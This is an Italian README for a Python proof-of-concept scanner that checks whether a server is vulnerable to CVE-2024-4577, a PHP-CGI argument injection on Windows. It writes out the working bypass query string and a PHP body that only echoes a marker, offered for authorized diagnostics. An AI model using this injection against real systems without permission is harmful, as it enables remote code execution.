
Questo script Python è un semplice strumento PoC (Proof of Concept) per diagnosticare la vulnerabilità PHP CVE-2024-4577.
⚠️ Questo strumento è fornito a scopo di diagnostica di sicurezza e deve essere utilizzato solo su sistemi di propria proprietà o su target con autorizzazione preventiva.
Questa vulnerabilità riguarda PHP quando viene eseguito in modalità CGI su Windows: tramite il bypass dei caratteri multibyte è possibile iniettare impostazioni PHP arbitrarie e indurre l'esecuzione di codice.
Questo script invia all'URL target una richiesta POST con un payload di bypass basato sulla query string e codice PHP, per determinare se è vulnerabile.
python3 --version
pip install requests
python3 cve_2024_4577_test.py
Esempio di input:
http://192.168.0.10/index.php
In alternativa, se inserisci solo il percorso root, viene gestito automaticamente
http://192.168.0.10
✅ [✅] 취약: 서버가 PHP 코드를 실행했습니다.
→ Il server è vulnerabile.
✔️ [✔️] 비취약 또는 차단됨
→ È stata ricevuta una risposta, ma la vulnerabilità non si è verificata.
❌ [❌] 요청 실패: ...
→ Test fallito a causa di errori di connessione, timeout, ecc.
Inserimento della stringa di bypass della vulnerabilità:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
Inserimento del codice PHP nel corpo della POST:
<?php echo 'CVE-2024-4577-TEST'; ?>
Se il server esegue questo codice, la risposta conterrà la stringa corrispondente, consentendo la diagnosi.
Questo script è fornito solo a scopo educativo e di ricerca sulla sicurezza. Scansionare o testare sistemi non autorizzati è illegale. L'utente si assume ogni responsabilità.
| Nome file | Descrizione |
|---|---|
cve_2024_4577_test.py | Script Python per il test della vulnerabilità |
README.md | Documento di istruzioni e descrizione (questo file) |
LICENSE.txt |
Segnala bug o suggerimenti via email o PR.
Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli. Copyright (c) 2025 KimJuhyeong95